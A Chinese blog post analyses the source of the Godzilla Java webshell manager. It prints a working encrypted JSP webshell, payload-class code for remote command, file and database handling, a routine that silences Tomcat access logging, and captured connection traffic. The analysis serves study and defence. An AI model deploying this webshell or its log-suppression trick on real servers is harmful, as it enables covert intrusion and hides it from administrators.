哥斯拉源码分析

2022-04-15  本文已影响0人  AxisX

知名的一些WebShell管理工具:

WebShell名称 开发语言 地址
中国菜刀(Chopper) C https://github.com/raddyfiy/caidao-official-version
中国蚁剑(AntSword) JS https://github.com/AntSwordProject/antSword
冰蝎(Behinder) Java https://github.com/rebeyond/Behinder
哥斯拉(Godzilla) Java https://github.com/BeichenDream/Godzilla
C刀(Cknife) Java https://github.com/Chora10/Cknife
Weevely Python https://github.com/epinna/weevely3

这里分析一下Java开发的WebShell。了解某一类工具可以从工具大体的框架入手,然后看一下关键模块的实现特点。先来说一说哥斯拉早期的版本V2.92。

哥斯拉V2.92

WebShell管理工具最基础的功能包括:

(1)生成一个特定的木马

GenerateShell
(2)使用WebShell管理器连接该木马
哥斯拉基础配置
(3)木马连接成功进入到WebShell终端
终端具备的功能如下,最核心的是命令执行、文件管理、数据库管理。
WebShell终端具备的功能

1. 生成的Java哥斯拉木马

哥斯拉有一个功能叫GenerateShell,需要输入密码、密钥、有效载荷、加密器。这里以Java为例,Java有效载荷称为JavaDynamicPayload,加密器有两种,Java_AES_BASE64Java_AES_RAW

选取BASE64加密器后,生成的jsp文件大致如下,密钥默认为key,但是在生成的jsp中是一串字符串。字符串“key"进行md5加密(32位小写加密)结果为3c6e0b8a9c15224a8228b9a98ca1531d,截取前16位即为xc的值。所以可以看出首先要对传入的密钥进行md5加密后取前16位处理。

JSP源码

<%! 
String xc="3c6e0b8a9c15224a"; 
String pass="pass"; 
String md5=md5(pass+xc); 
class X extends ClassLoader{
    public X(ClassLoader z){super(z);}
    public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }
    public byte[] x(byte[] s,boolean m){ 
        try{
            javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");
            c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));
            return c.doFinal(s); 
        }catch (Exception e){return null; }
    } 
    public static String md5(String s) {
        String ret = null;
        try {
            java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");
            m.update(s.getBytes(), 0, s.length());
            ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
        } catch (Exception e) {}
        return ret; 
    } 
    public static String base64Encode(byte[] bs) throws Exception {
        Class base64;String value = null;
        try {
            base64=Class.forName("java.util.Base64");
            Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
            value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
        } catch (Exception e) {
            try { 
                base64=Class.forName("sun.misc.BASE64Encoder"); 
                Object Encoder = base64.newInstance(); 
                value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
            } catch (Exception e2) {}
        }
        return value; 
    } 
    public static byte[] base64Decode(String bs) throws Exception {
        Class base64;byte[] value = null;
        try {
            base64=Class.forName("java.util.Base64");
            Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
            value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
        } catch (Exception e) {
            try { 
                base64=Class.forName("sun.misc.BASE64Decoder"); 
                Object decoder = base64.newInstance(); 
                value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
            } catch (Exception e2) {}
        }
        return value; 
    }
%>
<% 
    try{
        byte[] data=base64Decode(request.getParameter(pass));
        data=x(data, false);
        if (session.getAttribute("payload")==null){
            session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));
        }else{
            request.setAttribute("parameters", new String(data));
            Object f=((Class)session.getAttribute("payload")).newInstance();
            f.equals(pageContext);
            response.getWriter().write(md5.substring(0,16));
            response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
            response.getWriter().write(md5.substring(16));} 
        }catch (Exception e){}
%>

如果查看哥斯拉的shell->cryptions->JavaAes->template->shell.jsp文件,会发现jsp的模板文件分为两部分,上半部分对应globalCode变量,下半部分对应code变量。

<%!{globalCode}%><%{code}%>

下半部分的code变量逻辑如下
(1)密码后传入的数据进行base64和AES解密,赋值给data
(2)通过session中有没有payload属性判断是否第一次访问shell。第一次访问:把传入的data的Class对象(此时的datapayload.class的内容)放入payload。
(3)非第一次访问shell,将data放入request的parameters属性,从session中取出payload对应的Class并实例化为f对象。然后将上下文对象传递给f。并根据传入parameters参数的指令触发payload执行。
下半部分有两个方法:equalstoString,前者传递页面上下文,后者执行方法调用

2. Payload.class

Payload.class包含的一些属性和方法

 /* 属性 */
PageContext pageContext;
HashMap praameterMap = new HashMap<Object, Object>();
 /* 方法 */
Class g(byte[] b) :类加载
String get(String key):获取praameterMap某个键的值
byte[] getByteArray(String key):获取praameterMap某个键的值

// Shell相关
byte[] run() :核心方法,根据praameterMap中获取的evalClassName和methodName调用方法
void formatParameter():{"ILikeYou":"bWV0b28="} praameterMap,又将praameterMap放入request的parameters属性
boolean equals(Object obj):判断对象是否为PageContext类型
String toString():调用run方法,并清空request的parameters属性
byte[] test():返回"ok"的字节码
void noLog(PageContext pc):清空日志

// 文件管理
getFile()、listFileRoot()、readFile()、uploadFile()、newFile()、newDir()、deleteFile() 、moveFile() 、copyFile() 、deleteFiles(File f) 

// 命令执行
byte[] execCommand()

// 基础信息
byte[] getBasicsInfo()
byte[] include() 
Map<String, String> getEnv()
String getDocBase()
String getRealPath()

// 数据库管理
byte[] execSql()

// 反射
Object invoke(Object obj, String methodName, Object... parameters) 
Method getMethodByClass(Class cs, String methodName, Class... parameters) 
static Object getFieldValue(Object obj, String fieldName) 

// Base64操作
String base64Encode(String data)
String base64Encode(byte[] src)
byte[] base64Decode(String base64Str) 

Payload.class很长,一步步拆开来看,payload类同样继承自ClassLoader实现了类加载。

public class payload extends ClassLoader {
  public payload() {}
  
  public payload(ClassLoader loader) {
    super(loader);
  }
  public Class g(byte[] b) {
    return defineClass(b, 0, b.length);
  }

Shell相关

(1)run

run方法从praameterMap中获取类名和方法名,没有类名就在此payload类中寻找方法,然后invoke调用方法。然后从session属性中找该类名,如果找到了就进行实例化,然后执行equalstoString

  public byte[] run() {
    // 从praameterMap中获取"evalClassName"和"methodName"
    String className = get("evalClassName");
    String methodName = get("methodName");
    if (methodName != null) {
      // 如果没有类名就从此Payload类中获取方法
      if (className == null)
        try {
          Method method = getClass().getMethod(methodName, null);
          // 方法返回类型必须是byte[]
          if (method.getReturnType().isAssignableFrom(byte[].class))
            return (byte[])method.invoke(this, null); 
          return "this method returnType not is byte[]".getBytes();
        } catch (Exception e) {
          return e.getMessage().getBytes();
        }  
      try {
        // 从session属性中查找类名
        Class evalClass = (Class)this.pageContext.getSession().getAttribute(className);
        // 如果找到了就对类进行实例化
        if (evalClass != null) {
          Object object = evalClass.newInstance();
          object.equals(this.pageContext);
          return base64Decode(object.toString());
        } 
        return "eval class is null".getBytes();
      } catch (Exception e) {
        String message = e.getMessage();
        return ((message == null) ? "java.lang.NullPointerException" : message).getBytes();
      } 
    } 
    return "method is null".getBytes();
  }

  public String get(String key) {
    try {
      return new String((byte[])this.praameterMap.get(key));
    } catch (Exception e) {
      return null;
    } 
  }

(2)equals

equals方法,判断传入的Object对象是否是PageContext类型的,如果是,就赋值,并格式化参数

  public boolean equals(Object obj) {
    if (obj != null && PageContext.class.isAssignableFrom(obj.getClass())) {
      this.pageContext = (PageContext)obj;
      formatParameter();
      noLog(this.pageContext);
      return true;
    } 
    return false;
  }

(3)toString

toString方法,调用run,根据参数动态选择对应的方法并执行,然后清空request的parameters属性参数

  public String toString() {
    String returnString = new String(base64Encode(run()));
    this.pageContext.getRequest().setAttribute("parameters", null);
    return returnString;
  }

(4)noLog

noLog方法,清空日志。这个可以联想到Spring4Shell漏洞,都是用到了AccessLogValve,该类的父类AbstractAccessLogValve中有一个属性为condition,用来设置是否记录日志,如果ServletRequest.getAttribute()为null,就会记录请求。另外,如果要记录特定的请求,例如参数为shell的,需要ServletRequest.getAttribute("shell")为null。

想要获取AccessLogValve这个阀可以从pipeline入手,容器中的Engine、Host、Contextpipeline相互连接。所以从StandardContext开始,获取它的父类StandardHost、StandardEngine,然后获取它们的pipeline,找到AccessLogValve
经过调试会发现,StandardHost的First阀就是AccessLogValve。通过getConditiion方法获取condition的值,会为null,代表日志会被记录。哥斯拉是将condition的值改为了FuckLog,也就是只有当传入属性为FuckLog时日志才会被记录。这样攻击者访问服务器的请求就不会被记录了。

private void noLog(PageContext pc) {
    try {
      Object applicationContext = getFieldValue(pc.getServletContext(), "context");
      Object container = getFieldValue(applicationContext, "context");
      ArrayList<Object> arrayList = new ArrayList();
      while (container != null) {
        arrayList.add(container);
        container = invoke(container, "getParent", null);
      } 
      for (int i = 0; i < arrayList.size(); i++) {
        try {
          Object pipeline = invoke(arrayList.get(i), "getPipeline", null);
          if (pipeline != null) {
            Object valve = invoke(pipeline, "getFirst", null);
            while (valve != null) {
              if (getMethodByClass(valve.getClass(), "getCondition", null) != null && getMethodByClass(valve.getClass(), "setCondition", new Class[] { String.class }) != null) {
                String condition = (String)invoke(valve, "getCondition", new Object[0]);
                condition = (condition == null) ? "FuckLog" : condition;
                invoke(valve, "setCondition", new Object[] { condition });
                pc.getRequest().setAttribute(condition, condition);
                valve = invoke(valve, "getNext", null);
                continue;
              } 
              if (Class.forName("org.apache.catalina.Valve", false, applicationContext.getClass().getClassLoader()).isAssignableFrom(valve.getClass())) {
                valve = invoke(valve, "getNext", null);
                continue;
              } 
              valve = null;
            } 
          } 
        } catch (Exception exception) {}
      } 
    } catch (Exception exception) {}
  }

(5)formatParameter

这一步看似复杂,实际上只做了一件事,无论parameters获取到的值是什么,只是将{"ILikeYou":"bWV0b28="(value实际为字节码形式,如果base64解密为metoo)}放到request的parameters属性中

  public void formatParameter() {
    String parameterString = (String)this.pageContext.getRequest().getAttribute("parameters");
    parameterString = String.valueOf(parameterString) + "&ILikeYou=" + base64Encode("metoo");
    String[] parameters = parameterString.split("&");
    for (int i = 0; i < parameters.length; i++) {
      String onePraameter = parameters[i];
      int index = onePraameter.indexOf('=');
      if (index != -1)
        try {
          String name = onePraameter.substring(0, index).trim();
          String value = onePraameter.substring(index + 1, onePraameter.length());
          this.praameterMap.put(name, base64Decode(value));
        } catch (Exception exception) {} 
    } 
    this.pageContext.getRequest().setAttribute("parameters", this.praameterMap);
  }

如果此时再回看jsp下半部分,就有了更深的理解。第一次访问Shell时,先把Payload这个类放入session的payload参数中,然后实例化之后就可以调用其中的方法。之后再访问Shell时,下半部分核心就下面两步。

// 1
f.equals(pageContext); --> formatParameter + noLog
// 2
f.toString();
  1. 先把{"ILikeYou":"bWV0b28="}放入praameterMap,另外将整个praameterMap放入request的parameters属性中,更改日志访问记录为特定参数才记录。
  2. 调用run方法。从praameterMap中获取"evalClassName"和"methodName"执行相应的方法。run方法执行完成后,清空request的parameters属性,返回run的返回值

3. WebShell管理器连接木马

WebShell管理器连接界面的标题是ShellSetting,UI相关的类是/core/ui/component/dialog/ShellSetting.class,找到测试连接按钮对应的代码testButtonClick

    private void testButtonClick(ActionEvent actionEvent) {
        if (this.updateTempShellEntity()) { //获取页面中传入的参数,分别赋值给shellContext对应的字段,shellContext对应的类是ShellEntity
            if (this.shellContext.initShellOpertion()) {
                if (this.shellContext.getPayloadModel().test()) {
                    JOptionPane.showMessageDialog(this, "Success!", "提示", 1);
                } else {
                    JOptionPane.showMessageDialog(this, "Payload Test Fail", "提示", 2);
                }
            } else {
                JOptionPane.showMessageDialog(this, "initShellOpertion Fail", "提示", 2);
            }
        } else {
            JOptionPane.showMessageDialog(this, this.error, "提示", 2);
            this.error = null;
        }
    }

实际功能代码位于JavaShell.class的test方法

    public boolean test() {
        ReqParameter parameter = new ReqParameter();
        byte[] result = this.evalFunc((String)null, "test", parameter);
        String codeString = new String(result);
        if (codeString.trim().equals("ok")) {
            return true;
        } else {
            Log.error(codeString);
            return false;
        }
    }

其中调用的evalFunc方法,praameterMa添加className为空,methodName为test。在run方法的分析中知道如果从praameterMap中获取"evalClassName"为空,就调用Payload类中的方法,也就是调用Payload.test(),该test方法的返回值就是ok,所以这一步也是在测试能否连接上Payload类。

    public byte[] evalFunc(String className, String funcName, ReqParameter praameter) {
        if (className != null && className.trim().length() > 0) {
            praameter.add("evalClassName", className);
        }

        praameter.add("methodName", funcName);
        byte[] data = praameter.format().getBytes();
        return this.http.sendHttpResponse(data).getResult();
    }

ReqParameter.format

    public String format() {
        Iterator<String> keys = this.hashMap.keySet().iterator();

        StringBuffer buffer;
        for(buffer = new StringBuffer(); keys.hasNext(); buffer.append("&")) {
            String key = (String)keys.next();
            buffer.append(key);
            buffer.append("=");
            Object valueObject = this.hashMap.get(key);
            if (valueObject.getClass().isAssignableFrom(byte[].class)) {
                buffer.append(functions.base64Encode((byte[])valueObject));
            } else {
                buffer.append(functions.base64Encode(((String)valueObject).getBytes()));
            }
        }

        String temString = buffer.delete(buffer.length() - 1, buffer.length()).toString();
        return temString;
    }

4. 哥斯拉连接流量

根据上面jsp的分析知道,第一次连接是发送Payload类

第一次请求

请求头部,请求的地址就是哥斯拉JSP所在的服务器访问URL地址

POST /MemShellShowTest_war_exploded/gsl_v2_92.jsp HTTP/1.1
User-Agent: Java/1.8.0_241
Host: localhost:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 33035

请求Body

pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBu%2F%2FO2rbaC4ktNJrKmdUmNg3Dbv%2FJPbp22uOvBAebeBBE7msJ0XAXeBDJqARAUm34Z0trtU5IhQ%2BSTSk0RyCW5RRPLV%2BffkyW%2FAL8MuJrOxRVdo7nllbEIPvti1pPgJHn64s9sayyHbxH90rbg%2FA6%2BWktyctn9VYc8lcBwoTWWsbGU3oAaMl6KlawaVDNPypy%2Bk5TRNVinbU76YnZi5GJPsHy%2FUuT2NOvl8czGOGBiSIjU3xwL6Qo1gHLjMrt6yviqsBgH95gIq3iDwqKYnj3i3okpBSdAq%2FCgoolcEz5xQOunIyZG05YUNABMCaF6btQn1Q2CoEV3ZZAsU21c%2FycQj6racIAIc1NdiGlXD4CF%2BLfs%2F9HAxCWS6WclvZGS5ruq0aYz47Qb%2FjPMONkxkC35vPaLlksdbVMxMhTWjTFKYXbHe0KzPau9ZCFKwUPX3t%2BBGlRjvDnYH6mFJrHLz2bpD3EbxAEX4TYBQrhcJzlCJPWgeFHme2sXm274nd9%2Fx8HIXiDseGm6Mzd29OoKbmM2NaQ26snJffck%2FsxxdlrLoap8CTaZbOlNx%2FW0qZymhTOfkLLDhXyFMaRM45SoNtiw5iNbuFxHhBLAYSOGUm2G08WJUJ%2F7xPvtO15yupLCrlj0zNPOeHOxQhhdcZXxaZVc7jxnDKsdb54RBnND60%2F9rv4HTMsps%2F839GWaybuvKdJ7H4FVVujal8IwvYZEENRR9oVF2v64k1SkWuT1xOUcuplRB9rsCXt2XWYeGISfllgNsmqzKVGguBmLUanClNQgCF9AElGt4Pt45Nege6Mvwz7QYFpIDiIpTzXQXHB5Mhw0CiCNsJlPp9ZXePA3WS45mIpsjk8DSNpw8pzDj1l1qUglFw545VsX%2BSKjfQgatWgXVbRr1DEdS6zI%2BTw6dsWsp3fuj7mxqkcxZn3Bp3W9W0gwj%2BCtVZCJPJzUIQeFyDMXNuNymgKFIq9jAYhByCjCJ%2BzPT2bEbT5ERJFW39n0tEx3cEcFdB%2BtrbwuAFtj7MEC70%2BpFVsngliiDUbxpmA2KqYeJLJUJ552XsBz2ewkD1B8Vbwm31CSFgs7utieyAGXlfpbkDA9sVcGONe4%2B9AQvZ2fCOCwLY5abPqftD4soJaWLviSe7jihPDMmWmFhCCBFOTaCKZvRN5fnf9dwFz6pciVN26jbsLARGSh6G2h7ukaApcbyKMrq6elDaZp5iY85eKQJQ40hZKEL0DdTYYYWQDFqZoTB%2BFQL1pOdrROoUVTXAGSzsExG1QHVH5McQylewTr74nqLjpMQiiLVhTI5lKT%2Bvl4lZVL7QWkkPQ1DQcMQurRgrH3a12a1Li8JskEPdAGcTydwcSVjp%2BHUXgWoAd1zqSevBdbq7HZoFuNX40PS%2B1qcWiX5BtG8q2Tl6yPkrVShOjoVsvpNEthNXElIHVcdUg%2BoWS4c3728F401kmsiP3yoV4QNWF%2FQFIg0cgVRg7i6pDhBUtgkk%2FFqQaKPtg%2B3HLHv5Kqm3xzhtFk76kY9kNtPuh7hWxZSnGP%2BqjTLBrRSbVSzYcnSXUxxOx0AqBcSodj6n86Vnp7uL6PCETi6W5m6gxz%2FZWfOOG8hFnYFpJsTaRMEOClQmP4Xwuq9LNMW%2F2PILjHkBGmueYjSVzetR2vTQBVddWZ0fp9IcyVPNMeERKWH53GJL%2FCHZwVLXR%2Ba4p5FOX2X64thqS52L%2F%2Bu%2F1I2AgSylH1LexAMvBM1ZWG17hbAEcsIK%2BMJNykLJji2UILcJ4BdU2oUtQc92Dj44T%2BfqTucaSsAdyDOEFyb2SD2JtDlHXTMVYX30xReCm15E3J%2FVpn%2BpqHy7YOYGjpkNqjtQxs6EC3ekhySsIzdKpq0%2F%2FEDvWjLi%2FdZB1AaLndApumilCisxV3LssxbfFUmazeYgToURocx%2BG0mtaFQBAqLX1j3djhuzBRQQoCd8XdMeM9BYXUtvauQpDoqOC1Z31DjOQPvNAVx7uOG65ifxj1g0cY4YvhMdWsIjjoW7PlC7zleqrAomuipdfwNfzkvyWYum%2F919hteBH66gf1KK2Mv81N529ngtocBw2ZIZmv1YAl4YG7PYe6tuDXDifB2CYYfP6yRpgVnO8hswTzqPC5PJAlzpxNhoWMFxHfvOZYBbKUl3%2BoFDtPXDtG2zjlt4H3mGhG0NH%2FQ%2FAGO%2FgFgkqrUTQfra28LgBbY%2BzBAu9PqRVBvEdDi%2BcKdzkJDRV6HQ140z%2BctjR0EpzSRGv7eFdhuSQVlNmktHwjdelrld63QNvXLubx2urd6PePhr4SexTWLFVZ50csYssUBX0v1V%2Bp9doF%2FDy64GKjcriJmv50cidhZYY6DN5NwYWzZ%2B7%2FB1nu93QKEgaeqsg0YGqltJeOn2kJtPa28ciSt0dZbHLxtS44dviZ4wzQKodL45ZwrN3FvQgfBPJxD6LPoLKPbqteSzO%2FstKLmb%2FWW%2Bbb%2Bm0Sf8kwaZnX8JshNjFkLGh90lVyM9JRIlwmmVOQucLuk4gCIgWJaQnTTeVlHH2DCF909Iw1N3QIxjIv%2FCTI9E2EcdJpasYuWkKnji5r97QUgzIs1ARPJxbfRQqMKWpNBCFDGnGzo5ml%2Bm8MoZkp5%2FViiHBAmSYA49PtRyj6jaVFhWseBe6ZHAZeGqq4k6N5FUMUaDWeoHJFeCRsiaY9icuLZYP4EaPgXW5MZJ1A1JHl5OCJlCzOe68KmwS5neVzqbOxozQBt3VAtz%2F%2BznOrORdVkGyV%2FoWwG11YpS02sTZOlIH3gma7wvX6NzToFfBPpRcXdbs21xXn5bTtZuy%2BdHbIwJt6PHbft%2BqlkldxFtJejXLqnhj6CVZD5KGoeHV2f4HzJjb9UbYoI1nI2J5WSHNuUe9t0OEFS2CST8WpBoo%2B2D7cct81RjrqqGaqvVusTVUgZPNkTQIBtkMvdIKWkdwwcKbC6g1hgZIdeE2mM7Z%2BO1OVxZyVsJQz%2BEYMKEF3f0W0OZEdo0BxMxtToNwxw2Xk7zTS6DNgK0SjSCXQZ5IktYF2o%2BtrzXiscpAzFmczxJ0OseSBCa6XagbEzVNGmaNJJMwVRD%2Bz2zmERFIbckoDAJr6a6Q%2F%2FROCtJo8hIxqw1hiihaVED8hpcH%2BVVcKe3GJHvngNmEkvyDe9W7h19Uy%2BrS7TvrHUCxSriYk%2FZQbKiHy3E2QasEoBxf04fbnVFNM%2FjWdb4VqHgOwTfK4c7GXubzLRa0PA%2BA3rL3rRnWTDBTACL2rUwAtOjXB0u4AX3pTG5wRABzvSCKwPTZTJxmPhith3ZDi9IAvqn52mvgdIoifKIz0ZTg%2FZYXh2jLkuSxD8ZKFdrzRrhKpiq09%2BMe7kzc9ULqrZglAkQDEgAtllabsp0cFJEzMSeevJXrPrQSHX7NqBY4OI4rHd17lQ2faayXycluAZr2mtNZ6KJ%2Byp0%2BMStOdo0BxMxtToNwxw2Xk7zTS6HEuEOK5ak1KgY7vWCBg33FAzNB72W%2FJkKmjt%2BHWD71895mxA3HMyk7Dq3J61JBAra6il8On24g90VCXPnau%2BlwQBEMiKBwiylW3Bg1QqGYv4IZuC4KOFCDFkmNZ4QzVvLn4L41G8q6RM3jLdwa2wJYEiEgC7EkBedX7BgDBviVocjtcmfVEeu9psZLFjMzTkFhIxNRqtrV973j0Harn8ihcSI%2FBo3UCV7rwKOG%2FTSipfN83QSi6R9u56y%2B22RDc2CgUXmY5iAmcd1FPS3bz4lElsOcKpynB5h94%2BU8CLS0AKWbnuK1ZKgQ6AZWsPiCTUsg3wlV6Xx6Pu8cuAVls2ZO9Y3OE3vRnR59WcoQ7jbQKw%2FDiAdAPsa10k3ZH11wcN6vCz%2BTRoNFud1N%2ByQqxLFlYYfZ6bv63Fbrls1Q010hbMHfpBH%2BOv5GKGHL3Qq1LBz04%2BZflIQJTwddlWU%2FJEq6fG%2BNYP%2F3Q1bKIV8cPq1K5e3C%2BwlrdU%2F%2F3b%2BZCheoweXk5pYo3cj%2B51dOVF9%2BnSoeSZPBRb%2BpFjjrZgEHQhl0nPc9TjedH8ckMQ2FWPWkBGThTalVMP39WIdN82lbuymR2VQU4%2Flwt0RhLbbmyTKfw%2BJtCx8NNfU0zFKBwLipf4QrcEJRkNN5GCqzwUjTCP%2FbuG7XQycfPzK0HawLshF186tQ2NTR8dGucAWc8k2AOmA3bNF73bN8xf6vvC26PmoGrnvzTNIxyT3VfwI2PggFydg9T9gHaFq76bKZVOmWkpbnCf%2FH0sOM5siFtKk6d%2BO15GoT%2FSyeoXkKx%2BA2jNpCcFJztxRptPj3FDyjym%2FRsRY0mPUUdjsZW3ywXzWaQDLaPgWdYrgFcB%2B6rj8ri2RrbmHG6YPfVxrLfR1Q0mMnyawrWP6lyrXh%2BMp190tIzKv0Lnd%2F%2FY5lC3P%2B%2BdquyUenpeDa97gXcy5KEYRZqA%2B8x4mTbJ1IvmAoqauac0YU9Z6aGkpQ1HmegZySLPD3zrovj4FbvpGgqE4cD5tpuLUwHrixgKOpwhmV8l2iwbIgeNQcp9VX0fbw76Lmby7byn0ncThaHU9ONaYBjVhX7YB0je8zeYIkM7VC11wCqqhIflAD%2FPmyHTqHqyf9%2FKTS%2Fr1Feg7xpbuOsfzbB6OlzX%2FBnotuo5cftKOL5b9gfwx2VDTzSwV%2FEmM4QOKKIVw9RZeUjbLXQI2qZQ6vd2En6n7KB%2BH%2FCR9k85t5nRtci%2BYzpAJ1pyYtFdGKokJSniXqwxY8hLighExL6OwXVAYPqOLV5paY4%2B3NFTDi237copV29aCAXrJEApWibjJmIey27GQYy15Hf8b6H9i7EDqhlbA8J3TAGG3VuZoc6Gv8B3zG5sHpFdHXXE9I4GasrfB%2FlF66e4rJgvWgXDxIvN1XxfHQNPShPVquTdr6OIysDq3L21B8PidWueaptrF2DIfnYPey18WNlgmg7gSlhiH45Xk92%2BH%2FCR9k85t5nRtci%2BYzpAKWvrSnkl2t7d%2FzHXQYIE7NiPOJPJvVS9A71GmJ4tFDX%2BwMjdmmGegdFpNZ5uwjo82QpVORA7zMbH5tA%2BSpU5HaMAmNYOC4a38iJP9tmbLp5wFDO%2F2yeRiazRO6Mp5SUdGz%2BV4utnATs1n%2F481X9iJcPoLzX1mH1HMNqVsuicx2YKbQDuYE2JKrtms1tXj3YDqniBjeAnKNNxZihofeT68qR4U%2B8VjBP%2F8HvpiurvTwMlEk2JQMV%2FhDGKjWBcR76L%2Bgumvug7sNgN4DhMBip%2FHFhF1rY3mv6xxTZJh6h1jGn0MoEriG6BdCb3T9hjsIiN%2BVZ8d%2B9ekfsHbIcAQbA6dipj0P5v7hy%2ByOjLQGnhhzzXDsqDvNyT1vN6Dd6JzOLbeqOfCrBwCvH28LeDJ9ncFrhepw8FnasCeFkAhAdAViZyGhIklbjRvwzSj8vGAPGtaJPoCXt1aDv9TUlLeae%2FTZTisgX1zJ3zvTBDVCTfnV8ypaxsg9i6XRH9q1po9b%2B%2Bqf4SqQ9dVhHp2Yt1biq1BzBmAOAFhJyEcIomZmOvfDpCilAPnf8KS%2FrnhzVxIgmrX7I4ZV9nNXkq%2B841AxFIKW0DqSZQSBHyR%2BGVfu1k6lbZq2%2FmC6x985zcCPos9MPim3TsNweqL5fjCnBriEnHjBtprltBV%2BIFbWrJvxMXwOPdYmofJfoF6mpmqke8QuGlKEyKlpDsjoTQIUWYzDaWMfg5IotNPx4MLi2uhTGGpjQbmYEFJ6LQhMqrcAsdg0Im1P4kdwJJKb6kQmPjBzHzthFAcnufkl4QpWQJoZwZb1o2jOPB7GFJwzoGD4JWgy3%2BvQS1vwqllU4H6cNHzTv5uzDJei2leYEuT1Dhfja5mvc1P7Z65qKTc7Yy5vB%2FSS4qTXXQE3Mtt07ywgVVRRAdsCcmzWB7GEkKhSgCzWJtlAXznKOtoZZ8%2FTqFRqLtKtZPwPI%2FjSM8pJWNa9kynN01P1E6hp3gnvDXpbIt%2Fz11X0XfNnDaKgzHCIgT%2Fcsv%2B5kEAJC8htonBzgPgUbKhfj8%2F%2FhdIj0%2FrTCWpkT%2FvN%2Fsy8FAs%2B021NbBW8K%2FEYnCAxwfCH0BMDWQqOexX6kbgzuZ8wiuyYgPdlaiifqHxnr6crKu1IXB3NzeZRr4xLPDGvS6HA1cjfye57r2aJVV4N9CM%2FQFuEaFs9gIdamvdx%2F%2BmS8j%2FPRRqr6eDVWoim3tx1T66LHTCC6D0zP%2Bn%2FTtx2bycry3tYoXcj2Ela%2BllV06Zv23KZURijguIsIscgg6HpKsjQq%2BvsXLvKNcxGhrXebTfZpPdCgKQPr5UPgzlncm9ameFsARywgr4wk3KQsmOLZQiENfZselCx6s1mNAFSsrzs0J3AJ16z22CtxMp3YVLkXkOEFS2CST8WpBoo%2B2D7ccvHF%2BPOzwZH8pXI0v7sQFtVJDW5GL3zGBzNmyIy1KljEo3Qp6oHwP0zKD7yAyTSUJq0E9a%2F3bNSPOLlU%2BO0uM8MG1hhKXTOAKI1G1Z1ShkJnuSsYPyPnlxEBx%2FTGILTKrDcYlKXrEid8VSdmdxWMAsttFdnya50jRNeZIxcuZ0npy2PK%2FQTOrw74O7Xa33T9i1pWa16W%2FG3T6p4pkSxBmUh502LZk0Xq6BlcSVyUYe8MYbK7EzXe84g1Vx9MTFtCvclCHZsOiysPWekEPab8gxgnP2QtA0nfRgedaxRoVNvHr3ECdL0womaC5MG14t3ZXz%2B705GbKPb6sLJEB15IT1JKi4xIMAB2gY7B6uWdwQAJGJvWOVZZ5ZaUglULiQ8OLEtVthhXC62pCoi3PeQa09Jy9wvDWvWPUcrR4lZnlY0h%2Fo28ZDXQ6Lb6ZcHYmuOgukHsn4GpDAuyub32hJRWbgFodqa9Q5K2iSqSqumKE27tYgOF9M1igmx9M6js7diwEeGEmq38N8OnOLYpRcrlC5WkpG2QAHncG8jS8wAokhekdno9yxiUwihLPWk5%2BaWB3iiBzHxB3X%2BjstAkdNX4UUjw1%2BKSOmf2eg4d3CB0mk0af3wkiDSFXswec5cmlTukOizsQfoJTUEMrgJDkKrZJu7BQsW9iMyHd6UOhUbU4mCcexRE47reZn6XVCl2vL41oyYDtcIOu9LPUlvIdlkvuHdPASi%2F4mJpP4Fv7AjSOsoJprZ5tVSsvmNQE865y%2FV6j2t8y2fCjBW1VZ3bkVya%2Fe1M%2FTZkPSclH4tmjh%2B1pTNJEA0Ql9ndm5V%2B%2BfwbO9Hw3Vh60AXFc77lxKdbc10rZWBy5BA6%2FhxWcfnLLVFqjfXlkLTkg%2FBnkIal2nMSnI95a9AVwUnQw7fzbI74yxB57OFn6q6d%2BiYwhmUb5LRo%2BbEZqiKrqucmxocylopB4iZ5aVXKsaTKOU90Px9uvKO028GO3Yw6%2Fd04J%2BV4skZq%2BsBct5FSTyLiPHtse8yz7ZP%2FOV3hHKyN7kYfaJGjqBE0R2ShPDV997qriskx5GIRpK7WlVhP2lFPb4gJYD%2FtR3jDopMVFRZ4nKyw2FqTWsUyJM%2Fo5QWXpjRLFJWekWQmHB7ZUu0bXwwXwzBf7JDiAMODjNHlTZ3NLfrrrVk6fwHqSrIW3gUDxe9oBVoVpsUy3EYnDMi4IxzJ2uVoVFbOC7bxMgQkPr2R1Z1yWuG29XfW5Ir7Uzd1NuFU245F1KBoibSgqa4KRD1dhZ38wf1YefXeBbay0%2FhTDbz17hdeYw8GpSfGWYgbILhV59UWGNtciq3An1%2B%2BG1PdgJx8w60d5pv7VUn7jfzRi0lE1NeH3Hy15gurEwKgDKye1Ms6B7ISOisrAg7VO4kI%2BpaWCGGGKmWYjpUBn2sYvh1Jv4B79NCYr6SCg%2Fg%2BIiiPLnM2kZjCK2%2FJ6Ny8UnyESxEi3OFHxSAhPx5SUVBeT58RrVHr4r0bpoW8mJubqDkv4D2E9